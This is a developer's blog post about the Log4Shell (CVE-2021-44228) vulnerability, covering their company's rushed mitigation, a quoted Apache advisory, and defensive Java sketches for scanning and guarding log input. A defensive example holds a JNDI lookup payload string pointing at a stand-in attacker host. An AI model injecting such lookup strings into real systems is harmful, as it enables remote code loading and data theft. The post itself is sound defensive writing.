Critical Log4j Vulnerability Fixed
A meaty exploit was discovered and shared on 9 December. My company decided on Friday afternoon that all apps possibly containing the vulnerability needed to be mitigated by mid-day today. I agree with the concern, but I had reservations about the mitigation chosen, and in hindsight I think we could have handled it much more simply and less hastily. It went well enough, but we have been receiving additional incidents and seeing failures that are related, or likely related, to the ongoing mitigation efforts or to errors caused by them.
The CVE-2021-44228 exploit, widely referred to as Log4Shell, is allegedly simple, and the tiny published examples seem to work, although I can't reproduce it in simple examples of the ways we'd be likely to be using it. Basically, the log4j library allows writing simple statements such as log.info("something" + raw_input), and if that raw_input value contains a correctly formatted string, the logger evaluates the contents of that string while the log message is being built. That raw input could arrive via HTTP (and most of the examples use HTTP input), or it could come from echoing previously stored values; the key is that it hasn't been altered enough to break the executable aspect of the string. In the simplest example I can create, built to ensure that only the library is in play, I can't get it to do anything but the expected echoing of the input string. I'm modelling my test after examples from a Cloudflare blog I found early in my investigation. I'm still tinkering, but my mitigation efforts are done, so I really don't care any more.
So, three things need to be right. The vulnerable versions of the library need to be in use. A raw input string needs to be fed to a log statement in the way that the logger will evaluate it. And the statement needs to be able to execute as intended. Probably a fourth thing, too, in that the execution needs to have some meaning and value.
This is not unlike SQL injection, which we still find instances of in careless code: a savvy input can alter a planned SQL statement and make it do unintended things. This is easily mitigated by not doing that simple raw injection of data, and instead encoding the strings so that anything that could result in command execution gets turned into harmless characters. The easiest example is a SQL injection attempt that includes a quote character to try to end a string, followed by SQL code to execute something different. This is a humorous, not exactly inaccurate example:
In this case, according to the articles that are everywhere on the Internet right now (most of which are repeats of other articles, and few of which have useful substance...which is fair because they aren't generally written for people who can understand the details), this can include code injection and execution in the running apps. This, particularly, is very hard to do, and requires file system and code loading events to take place. One discussion included how the command could download a class file into the app's execution folders, making its contents available to be executed. There is a whole bunch of stuff that gets in the way of that being easy. Possible, yes, but not easy.
More important, and much easier, the injected command could leverage its access to the current request or running server, grab whatever data might be accessible in memory, and share it. Or, a DoS attack could cause that log message to block and wait long enough to disrupt services. That one is pretty easy. Whatever the external resource does with the data, it isn't just that the log contains stuff, it's that the request contains stuff. The exploiter puts the right request together, and all the information is sent to the remote server named in the exploit. This is how credit cards and other information are stolen. One way, anyway.
To be sure, I'm not saying it isn't important, but it probably didn't warrant the concern and late-Friday chaos that occurred. Certainly not a push to mitigate within the next 24 hours. We did it, but I'm waiting to see if we had reason to rush it. We're in a bit of a careful time with software releases, such that I told my team we couldn't do our regularly scheduled and generally well-vetted release next week. But now every JDK app in the company is likely to be redeployed. And with that comes the risk we wanted to avoid: accidentally breaking flows and dependencies and introducing unintended changes.
As my team rebuilt our apps, simply replacing vulnerable versions with the protected newer version, I asked if we had checked whether we were logging raw input that could come from our REST or other HTTP inputs, or straight out of other data sources. No checking had been done. Some suspected the answer was "yes," as in the case of "user can't log into this app," where the user or app name is provided in the request and could be echoed raw in the log messages. In fairness, someone pointed out that we also don't write all of the logging statements in an app, since some are in the other libraries we use. When I asked if we saw any evidence of this kind of logging, especially with any of the examples from any of the articles, the answer was "no, none we see."
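For the "user can't log into this app" case, here is a minimal sketch of what checking and defusing a raw value before it reaches a log statement could look like. The class and method names are hypothetical, and breaking up the "${" marker is an illustration of the idea only: it does nothing for log statements inside third-party libraries, and it is no substitute for upgrading the library.

```java
final class LogInputGuard {
    /** True if the value contains the "${" marker that starts a Log4j lookup. */
    static boolean containsLookupMarker(String raw) {
        return raw != null && raw.contains("${");
    }

    /** Breaks up every "${" so the value can no longer be read as a lookup. */
    static String neutralize(String raw) {
        return raw == null ? "" : raw.replace("${", "$ {");
    }

    public static void main(String[] args) {
        // Hypothetical hostile value arriving as a user name in a request.
        String userName = "${jndi:ldap://attacker.example/a}";
        System.out.println("flagged: " + containsLookupMarker(userName));
        System.out.println("user can't log into this app: " + neutralize(userName));
    }
}
```

Checking for any "${" rather than for "${jndi:" is deliberate, since nested lookups can hide the word jndi from a simple pattern match.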
Here's what the Apache Log4j site currently says about the exploit, in case they change it later:
News
CVE-2021-44228
The Log4j team has been made aware of a security vulnerability, CVE-2021-44228, that has been addressed in Log4j 2.15.0.
Log4j’s JNDI support has not restricted what names could be resolved. Some protocols are unsafe or can allow remote code execution. Log4j now limits the protocols by default to only java, ldap, and ldaps and limits the ldap protocols to only accessing Java primitive objects by default served on the local host.
One vector that allowed exposure to this vulnerability was Log4j’s allowance of Lookups to appear in log messages. As of Log4j 2.15.0 this feature is now disabled by default. While an option has been provided to enable Lookups in this fashion, users are strongly discouraged from enabling it.
For those who cannot upgrade to 2.15.0, in releases >=2.10, this vulnerability can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. For releases from 2.0-beta9 to 2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.
Other News
Log4j 2.15.0 is now available for production. The API for Log4j 2 is not compatible with Log4j 1.x, however an adapter is available to allow applications to continue to use the Log4j 1.x API. Adapters are also available for Apache Commons Logging, SLF4J, and java.util.logging.
Log4j 2.15.0 is the latest release of Log4j. As of Log4j 2.13.0 Log4j 2 requires Java 8 or greater at runtime. This release contains new features and fixes which can be found in the latest changes report.
Some of the new features in Log4j 2.15.0 include:
- Support for Arbiters, which are conditionals that can enable sections of the logging configuration for inclusion or exclusion. In particular, SpringProfile, SystemProperty, Script, and Class Arbiters have been provided that use the Spring profile, System property, the result of a script, or the presence of a class respectively to determine whether a section of configuration should be included.
- Support for Jakarta EE 9. This is functionally equivalent to Log4j’s log4j-web module but uses the Jakarta project.
- Various performance improvements.
Log4j 2.15.0 maintains binary compatibility with previous releases.
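Going back to the mitigation part of that notice, the system-property option can be sketched in a few lines. The property name comes straight from the quoted text; the class and method names are made up for illustration. The assumption here is that this runs before Log4j initializes, which is why passing -Dlog4j2.formatMsgNoLookups=true on the JVM command line is usually the safer route. Later Log4j advisories superseded this advice, so treat it as a snapshot of the guidance quoted above.

```java
final class Log4jMitigation {
    // Property name as given in the Log4j notice quoted above.
    static final String NO_LOOKUPS_PROPERTY = "log4j2.formatMsgNoLookups";

    /** Sets the property; only useful if called before Log4j is initialized. */
    static void disableMessageLookups() {
        System.setProperty(NO_LOOKUPS_PROPERTY, "true");
    }

    public static void main(String[] args) {
        disableMessageLookups();
        System.out.println(NO_LOOKUPS_PROPERTY + "="
                + System.getProperty(NO_LOOKUPS_PROPERTY));
    }
}
```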
While listening to my team fix things at work, I spent a little time fixing some of my hobby projects. I did a scan for log4j references in build files, included JAR files in lib folders, property files, and log statements in code folders using ack. Fantastic tool that, for such quick digging through giant collections. Sadly, it reported a bunch of stuff in version control that I had to figure out how to filter, but that kept me busy.
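A rough Java equivalent of the JAR part of that scan might look like the following. It is a sketch, not the ack command used above: the class name, the list of skipped version-control folders, and the file-name pattern are all assumptions, and it only matches on file names rather than looking inside archives.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.List;
import java.util.regex.Pattern;
import java.util.stream.Collectors;
import java.util.stream.Stream;

final class Log4jJarScan {
    // Assumed naming convention: log4j-core-<version>.jar
    private static final Pattern CORE_JAR = Pattern.compile("log4j-core-.*\\.jar");
    // Version-control folders whose contents should not be reported.
    private static final List<String> SKIPPED_DIRS = List.of(".git", ".svn", ".hg");

    /** Returns log4j-core JARs under root, ignoring version-control folders. */
    static List<Path> findCoreJars(Path root) throws IOException {
        try (Stream<Path> paths = Files.walk(root)) {
            return paths
                    .filter(Files::isRegularFile)
                    .filter(p -> CORE_JAR.matcher(p.getFileName().toString()).matches())
                    .filter(p -> !insideSkippedDir(root.relativize(p)))
                    .sorted()
                    .collect(Collectors.toList());
        }
    }

    /** True if any element of the relative path is a skipped folder name. */
    private static boolean insideSkippedDir(Path relative) {
        for (Path part : relative) {
            if (SKIPPED_DIRS.contains(part.toString())) {
                return true;
            }
        }
        return false;
    }

    public static void main(String[] args) throws IOException {
        Path root = Path.of(args.length > 0 ? args[0] : ".");
        findCoreJars(root).forEach(System.out::println);
    }
}
```

The walk still descends into the skipped folders and filters their files out afterwards, which is wasteful on large repositories but keeps the sketch short.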
Because I'm a huge fan of Continuous Modernization, I didn't have too much to do. In a couple projects where I or a dependency did use log4j, I ensured the version was updated to v2.15.0, as recommended. I rebuilt and redeployed those apps, 'cause it was easy and Continuous Modernization. I did check each of these projects and didn't find any cases where I had injected raw input into log messages. In a few cases I found that log4j was included but not used, so I removed it instead. Finally, I dug through my log analyzer looking at the error logs for the kinds of things a dependency might have logged, but didn't find anything in the last year of data matching a '${' formatted attempt. There are way more PHP attacks than any Java attack, and even they didn't include that in the captured log messages.
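The log check described above boils down to looking for the '${' marker in captured messages. A minimal sketch of that search, assuming the log is available as plain text lines (the class and method names are hypothetical, and a real log analyzer would have its own query language for this):

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.ArrayList;
import java.util.List;

final class LookupLogScan {
    /** Returns the 1-based numbers of lines that contain the "${" marker. */
    static List<Integer> linesWithLookup(List<String> logLines) {
        List<Integer> hits = new ArrayList<>();
        for (int i = 0; i < logLines.size(); i++) {
            if (logLines.get(i).contains("${")) {
                hits.add(i + 1);
            }
        }
        return hits;
    }

    public static void main(String[] args) throws IOException {
        if (args.length == 0) {
            System.err.println("usage: java LookupLogScan.java <logfile>");
            return;
        }
        List<String> lines = Files.readAllLines(Path.of(args[0]));
        for (int lineNumber : linesWithLookup(lines)) {
            System.out.println(lineNumber + ": " + lines.get(lineNumber - 1));
        }
    }
}
```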
A little bit of me does want to get my test working, both because of pride (it seems so straightforward) and because I want to see if the exploit will execute even if the message isn't logged. I mean, log.error() should be the most likely to be successful, but I'm curious whether log.debug() evaluates that string enough to make the exploit call, even if the message is then discarded. I would expect (and maybe I'll look at the log4j code to confirm) that the level is checked first thing, to shortcut any use of the string. The runtime will concatenate "something " + raw_input, so if raw_input contained a valid ${exploit} string, then "something ${exploit}" would be passed to the logger, but with the level check coming first, the logger would never look at and interpret the exploit part of the string.
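The ordering in that expectation can be modelled with java.util.logging from the JDK. To be clear about the assumption: this is a stand-in, not Log4j, and it says nothing about what Log4j's code actually does. It only shows the pattern of the caller concatenating the string first, and the logger dropping a below-threshold message before any handler sees it. The class and method names are made up for the demo.

```java
import java.util.concurrent.atomic.AtomicInteger;
import java.util.logging.Handler;
import java.util.logging.Level;
import java.util.logging.LogRecord;
import java.util.logging.Logger;

final class LevelCheckDemo {
    /** Counts the records that actually reach a handler. */
    static final class CountingHandler extends Handler {
        final AtomicInteger published = new AtomicInteger();

        @Override public void publish(LogRecord record) { published.incrementAndGet(); }
        @Override public void flush() { }
        @Override public void close() { }
    }

    /** Logs one message and reports how many records got past the level check. */
    static int recordsPublished(Level threshold, Level messageLevel, String rawInput) {
        Logger logger = Logger.getAnonymousLogger();
        logger.setUseParentHandlers(false); // keep the demo quiet on the console
        logger.setLevel(threshold);
        CountingHandler handler = new CountingHandler();
        logger.addHandler(handler);

        // The concatenation happens here, before the logger is involved at all.
        String message = "something " + rawInput;
        logger.log(messageLevel, message);
        return handler.published.get();
    }

    public static void main(String[] args) {
        String raw = "${exploit}"; // placeholder, as in the text above
        System.out.println("FINE at INFO threshold:   "
                + recordsPublished(Level.INFO, Level.FINE, raw));
        System.out.println("SEVERE at INFO threshold: "
                + recordsPublished(Level.INFO, Level.SEVERE, raw));
    }
}
```

Whether Log4j behaves the same way for a discarded debug message is exactly the open question; reading its source or getting the test working is the only way to confirm it.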